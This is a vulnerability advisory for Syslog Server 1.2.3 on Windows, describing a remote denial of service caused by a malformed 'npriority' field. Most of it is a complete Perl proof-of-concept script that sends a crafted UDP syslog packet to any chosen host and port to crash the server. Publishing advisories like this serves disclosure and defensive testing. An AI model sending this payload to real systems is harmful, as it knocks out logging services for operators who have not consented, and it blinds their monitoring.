Title: Syslog Server "npriority" field remote Denial of Service vulnerability Software : Syslog Server Software Version : Syslog Server 1.2.3 Vendor: https://sourceforge.net/p/syslog-server/ Vulnerability Published : 2016-07-02 Vulnerability Update Time : Status : Impact : Medium(CVSS2 Base : 5.0, AV:N/AC:L/Au:N/C:N/I:N/A:P) Bug Description : Syslog Server 1.2.3 is a free syslog server for Windows systems. The syslog server cannot handle the content of the npriority field well, whereupon the server may be collapsed by receiving a customized packet. Proof Of Concept : ----------------------------------------------------------- #!/usr/bin/perl -w #PoC by demonalex (chaoyi.huang_at_connect.polyu.hk || demonalex_at_163.com) use IO::Socket; use POSIX qw(strftime); $|=1; $host=shift; $port=shift; die "Usage: $0 \$host \$port\n" if ((!defined($host)) || (!defined($port))); $npriority = '<A>'; $ndate = strftime "%b%e %H:%M:%S", localtime; $nhostname = "10.0.0.2"; $npid = 'fuzzer[10]'; $nmsg = "Syslog Fuzzer v2"; $header = $ndate.' '.$nhostname.' '.$npid; $packet = $npriority.$header.': '.$nmsg; $con=new IO::Socket::INET->new(PeerPort=>$port, Proto=>'udp', PeerAddr=>$host); $con->send($packet); print "Done!\n"; $con->close; exit(0); ----------------------------------------------------------- Credits : This vulnerability was discovered by ChaoYi.Huang_at_connect.polyu.hk mail: ChaoYi(dot)Huang(at)connect(dot)polyu(dot)hk / demonalex(at)163(dot)com / chaoyi(dot)huang(at)ccbny(dot)com Pentester/Independent Researcher